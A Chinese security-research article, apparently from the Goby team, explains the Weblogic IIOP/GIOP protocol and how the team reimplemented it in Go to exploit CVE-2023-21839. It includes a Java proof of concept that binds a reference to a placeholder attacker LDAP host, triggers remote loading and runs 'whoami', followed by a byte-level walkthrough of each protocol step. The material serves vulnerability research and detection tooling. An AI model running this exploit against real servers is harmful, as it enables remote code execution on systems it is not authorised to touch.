跨语言的艺术:Weblogic 序列化漏洞和 IIOP 协议

本文涉及的产品
Serverless 应用引擎免费试用套餐包,4320000 CU,有效期3个月
服务治理 MSE Sentinel/OpenSergo,Agent数量 不受限
云原生网关 MSE Higress,422元/月
简介: Weblogic序列化漏洞主要依赖于T3和IIOP协议,在通信交互方面存在诸多问题,如跨语言、网络传输等,给漏洞检测和利用带来诸多不便。在WhiteHat Labs的理念中,漏洞检测和利用是一项创造性的工作,应该以最简洁高效的方式实现,以保证漏洞的跨平台性和实用性。因此,我们实现了跨语言的IIOP协议通信方案来解决序列化漏洞问题。

0x01 探索总结

Weblogic序列化漏洞主要依赖于T3和IIOP协议,在通信交互方面存在诸多问题,如跨语言、网络传输等,给漏洞检测和利用带来诸多不便。在WhiteHat Labs的理念中,漏洞检测和利用是一项创造性的工作,应该以最简洁高效的方式实现,以保证漏洞的跨平台性和实用性。因此,我们实现了跨语言的IIOP协议通信方案来解决序列化漏洞问题。

在Goby的CVE-2023-21839漏洞中,我们成功实现了IIOP协议跨语言通信的解决方案,在漏洞检测和利用上取得了完美的效果。

1-1.gif

0x02 Weblogic IIOP

GIOP是CORBA规范定义的一种协议,用于分布式对象之间的通信和交互。它为对象的请求、响应、异常、命名等定义了基本的通信模式和协议规范。简单来说,GIOP是一种抽象的协议标准,定义了通信模式和协议规范,并不是具体的协议实现。

IIOP 是一个 TCP/IP 协议栈,它实现了 GIOP 协议,允许 CORBA 对象通过 Internet 进行通信和交互。简单来说,IIOP协议就是在TCP/IP层实现的GIOP协议。

RMI-IIOP 是Java 远程方法调用(RMI) 协议的一种实现方式,它扩展了IIOP 协议,具有通过RMI 远程调用Java 对象的功能。简单来说,RMI-IIOP 协议结合了RMI 远程调用Java 对象的功能和IIOP 协议。(在本文的 Weblogic 部分,RMI-IIOP 将被视为 IIOP 协议。)

在《Weblogic IIOP Protocol NAT Network Bypass》一文(https://www.r4v3zn.com/posts/144eb4b6/#more)中提到“T3协议本质上是RMI中用于数据传输的协议。RMI- IIOP同时兼容RMI和IIOP,因此在Weblogic中,任何可以通过T3序列化的代码也可以通过IIOP协议进行序列化。对于同时启用了IIOP和T3协议的Weblogic,在序列化数据协议传输的过程中并没有本质区别,Weblogic在通信过程中可能存在网络问题。因此,为了解决Java序列化问题和IIOP网络问题,我选择了IIOP协议作为本次Weblogic序列化协议研究的重点。

0x03 IIOP攻击流程

image.png

以CVE-2023-21839 Weblogic序列化漏洞为例,在Weblogic的IIOP攻击过程中,攻击者首先初始化上下文信息,使用rebind()方法将恶意对象绑定到注册表,然后触发该漏洞通过使用 lookup() 方法从恶意地址远程加载存根对象。自定义的恶意对象在加载过程中进行自绑定操作,将一个带有echo的对象绑定到Weblogic注册中心,然后远程调用该对象中的方法,达到攻击echo的目的。

概念验证(poc):

public class main {
    public static void main(String[] args) throws NamingException, RemoteException {
        ForeignOpaqueReference foreignOpaqueReference = new ForeignOpaqueReference("ldap://xxx.xxx.xxx.xxx:1389/exp", null);
        String iiop_addr = "iiop://10.211.55.4:7001";
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put("java.naming.provider.url", iiop_addr);
        Context context = new InitialContext(env);    // Initialize context and establish interactive connections  LocateRequest LocateReply
        String bind_name = String.valueOf(System.currentTimeMillis());
        context.rebind(bind_name, foreignOpaqueReference);  //Bind remote objects rebind_any
        context.lookup(bind_name);  // Get Remote Objects resove_anyClusterMasterRemote
        clusterMasterRemote = (ClusterMasterRemote)context.lookup("selfbind_name"); //Obtain self bound echo objects
        System.out.println(clusterMasterRemote.getServerLocation("whoami"));  // Executing methods in remote objects
    }
}

3.1 Java中的攻击流程

image.png

Weblogic中IIOP序列化交互开始时,客户端用new初始化上下文信息,InitialContext()并使用locateNameService()方法将目标地址、序列化对象等信息封装到IIOP协议请求包中作为消息LocateRequest与Weblogic服务器建立通信.

image.png

当客户端收到LocateReply来自服务器的消息时,表明通信交互已经建立。客户端会解析响应消息体中的信息,提取相关信息(如Key Address、内部类地址、上下文信息等)作为下一次请求消息的验证信息。

image.png

通信建立后,IIOP 将Key Address在交互建立期间使用服务器响应数据包中的作为下Key Address一个请求中的。bind()or方法执行时rebind(),会将绑定的对象名称、对象的序列化数据等信息封装到Stub data请求消息体的字段中进行消息传输。

image.png

image.png

  1. IIOP 协议在执行lookup()方法时,首先调用lookup()创建的上下文对象中的方法。该方法根据上下文是否为 类型来决定调用lookup()哪个方法。由于上下文对象属于 NamingContextAny 类型,所以字符串 var1使用该方法转换为数组并传递给该方法。最后将消息封装成序列化的字节流,通过调用方法发送给服务端。lookup()NamingContextAnyWNameComponent (Wide Name Component)Utils.stringToWNameComponent(var1)this.lookup()resolve_any()

0x04 IIOP的跨语言实现

在“IIOP攻击过程中“一章,在交互部分,当Weblogic处于内网环境时,客户端会使用LocateReply中返回的Weblogic内部类的内部网络地址作为下一个数据包的目标地址。这会导致客户端发送数据包到自己的内部地址,导致网络通信中断问题。另外,由于Go没有官方的IIOP协议库,所以很难对Goby安全工具实施漏洞攻击。如果我们添加一个Java程序作为插件,会使Goby更加臃肿,不符合白帽学院安全研究院的漏洞价值观,针对这些问题,我们决定直接复制IIOP协议作为最终解决方案。

4.1 实现思路

协议通信的本质是在网络上以字节流的形式传输数据。因此,Go实现IIOP协议的方式是模拟IIOP通信的字节流。 对于上一节描述的攻击过程,我们将攻击过程中的IIOP协议通信分为四个部分:建立交互、绑定远程对象、获取远程对象、执行对象方法。在Java中,这些主要是通过以下方法来完成的:

Context context = new InitialContext(env);    // Initialize up and down connections, establish interactive connections LocateRequest message LocateReply function
context.rebind(bind_name, foreignOpaqueReference);  // bind remote object Request message rebind_any function
context.lookup(bind_name);  // get remote object Request message lookup function
ClusterMasterRemote clusterMasterRemote = (ClusterMasterRemote)context.lookup("selfbind_name"); //Obtain self bound echo objects 
clusterMasterRemote.getServerLocation("whoami");  // Executing methods in remote objects

在模拟IIOP协议实现时,我们只需要实现上述方法执行过程中协议交互的字节流即可。

4.2 GIOP协议规范

GIOP(General Inter-ORB Protocol)是CORBA规范定义的一种协议,用于分布式对象之间的通信和交互。它定义了对象请求、响应、异常、命名等的基本通信模式和协议规范。

image.png

GIOP 消息由两部分组成:消息头和消息体。

GIOP消息头包括四个字段:Magic(GIOP标识)、Version(GIOP版本)、Message Flags(标志)、Message type(消息类型)和Message size(消息体长度)。

在GIOP消息体中,主要包括Request id(请求标识)、TargetAddress(目标对象密钥ID)、Key Address(密钥地址)、Request operation(操作方法)、ServiceContext(服务上下文信息)等字段。

限于篇幅,这里不再详述GIOP字段的含义。如果您想更深入地研究协议内容,请参阅我们总结的手册“GIOP 协议分析”。( https://github.com/FeatherStark/GIOP-Protocol-Analysis)。

4.2.1 GIOP协议通讯过程

  • 在通信的初始阶段,客户端首先LocateRequest向服务器发送一个类型的消息来建立通信。服务端验证请求信息并响应消息类型,LocateReply表示已经收到客户端的请求,开始与客户端进行交互。
  • 通信建立后,客户端发送一个类型的消息Request来执行服务器中的一个方法。消息的请求体Request包含键地址(Key Address)、要执行的方法名(Request operation)、消息上下文(Service Context)、调用远程对象的信息(Stub data)等。
  • 服务器正确接收并解析请求消息后,返回一条No ExceptionReply类型的消息。如果请求报文解析错误或者服务器端出现异常,则服务器响应一个类型为Reply的User Exception/System Exception消息,响应体中包含异常ID( Exception id)信息。

4.3 初始化上下文

Context context = new InitialContext(env); *// Initialize up and down connections, establish interactive connections LocateRequest message LocateReply function*

在Java代码中,初始化上下文信息建立了对象创建过程中的IIOP协议交互过程。因此,在Go语言中,实现Weblogic生成的字节流new InitialContext(env)并发送给Weblogic就足够了。IIOP 协议实现中创建对象的过程new InitialContext(env)由消息表示LocateRequest

image.png

客户端发送的消息LocateRequest有固定的格式,包括GIOP协议标识、协议版本、消息类型、消息标识等信息。

image.png

由于LocateRequest是固定格式的序列,可以直接发送给服务器建立交互连接。

image.png

服务端收到LocateRequest消息并验证无误后,向客户端响应消息LocateReply。该LocateReply消息包含有关服务器上下文、密钥地址、长度和其他详细信息的信息。

image.png

交互建立后,在接下来的通信过程中会用到响应体中的关键地址,所以需要将其提取保存起来,以备后用。为此,我们需要提取第一个的长度Key Address length,然后根据Key的长度计算出Key Address,并存储起来以备下次请求使用。另外,由于下一个请求包的目标地址在我们的控制之下,从根本上避免了之前出现的NET网络问题。通过这样做,通信已成功建立。

image.png

通信建立后,为了验证Key Address服务器返回的合法性,我们向服务器发送一条Request带有方法名的消息。_non_existent如果服务器以No Exception状态响应,则表明该Key Address有效。

4.4 绑定远程对象

context.rebind(bind_name, foreignOpaqueReference); *// bind remote objests Request message rebind_any function*

在 Java 语言中,该rebind()方法可用于将对象绑定到 Weblogic 注册表。在Go语言中,我们可以实现方法的字节流context.rebind(),将要绑定的名称和序列化对象添加到字节流中,然后发送给Weblogic。

rebind()在IIOP协议的具体实现中, method的操作方法名是rebind_any.

image.png

通过该rebind_any方法将绑定名称和序列化后的对象数据Stub data发送给服务器,服务器进行重新绑定操作,将对象绑定到Weblogic Register。

image.png

在Go中模拟该方法的核心rebind_any是将生成的payload字节流添加到请求体末尾的Stub数据段中。

4.5 获取远程对象

context.lookup(bind_name); *// bind remote object Request message lookup function*

在Java代码中,lookup()可以通过context对象的方法获取Weblogic中绑定名的stub对象。同样,在Go语言中,我们可以实现方法的字节流context.lookup(),将要绑定的名称添加到字节流中,然后发送给Weblogic。

在IIOP协议的具体实现中,lookup() 方法的操作方法名是resolve_any.

image.png

resolve_any方法通过发送注册命名信息获取注册中心的存根对象。这里的Go字节码实现和前面的类似,都是把信息放在里面,Stub data然后发送给服务器,但是这里存放的是stub的命名信息.

image.png

的响应消息resolve_any会生成一个新的Key Address,其中包含获取远程对象的引用地址等信息。在执行该对象中的方法时,需要将新请求消息中的Key Address替换为该信息。这样对象中的方法就可以正常执行了。

4.6 执行对象方法

执行完lookup()方法后,我们就得到了远程对象的存根信息,然后就可以调用对象中的方法来达到调用远程方法的目的了。代码 clusterMasterRemote.getServerLocation(“whoami”) 是调用远程对象中方法的示例。

image.png

以上内容描述了在CVE-2023-21839漏洞上绑定echo类,使用Go语言实现字节流的过程。我们需要以GIOP字节流的格式实现字节流,将Request操作字段的值设置为我们要执行的方法名,将Operation长度设置为方法名的长度,并设置Stub数据到执行方法的字节流。最后封装成GIOP字节流发送给Weblogic。该方法可以触发漏洞并获得回声效果,如下图所示。

19.gif

目录
相关文章
|
7月前
|
安全 Java Nacos
nacos常见问题之反序列化漏洞如何解决
Nacos是阿里云开源的服务发现和配置管理平台,用于构建动态微服务应用架构;本汇总针对Nacos在实际应用中用户常遇到的问题进行了归纳和解答,旨在帮助开发者和运维人员高效解决使用Nacos时的各类疑难杂症。
552 1
|
Web App开发 安全 Java
WebLogic Server 远程代码执行漏洞(CVE-2021-2109)
WebLogic Server 远程代码执行漏洞,攻击者可通过使用恶意Payload对目标服务器实施攻击并接管服务器获取执行权限。
443 1
|
安全 Java 应用服务中间件
WebLogic Server 远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389)
WebLogic Server 存在远程代码执行漏洞,攻击者通过特定Payload对目标服务器进行恶意利用从而获取服务器控制权限,进一步操作。
369 1
|
XML 存储 JSON
【面试题精讲】序列化协议对应于 TCP/IP 4 层模型的哪一层?
【面试题精讲】序列化协议对应于 TCP/IP 4 层模型的哪一层?
|
7月前
|
安全 Oracle 关系型数据库
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
|
Web App开发 人工智能 供应链
金蝶云星空管理中心反序列化命令执行漏洞(RCE)
​金蝶云星空管理中心存在反序列化命令执行,攻击者可通过该漏洞获取敏感信息,进而接管服务器。
603 2
|
7月前
|
XML JSON 分布式计算
如何选择序列化协议:关键因素与场景分析
如何选择序列化协议:关键因素与场景分析
68 0
|
XML JSON JavaScript
【面试题精讲】常见序列化协议有哪些?
【面试题精讲】常见序列化协议有哪些?
|
7月前
|
存储 JSON 网络协议
【计算机网络】序列化,反序列化和初识协议
【计算机网络】序列化,反序列化和初识协议
|
7月前
|
C++
[序列化协议] --- protobuf
[序列化协议] --- protobuf
67 0

热门文章

最新文章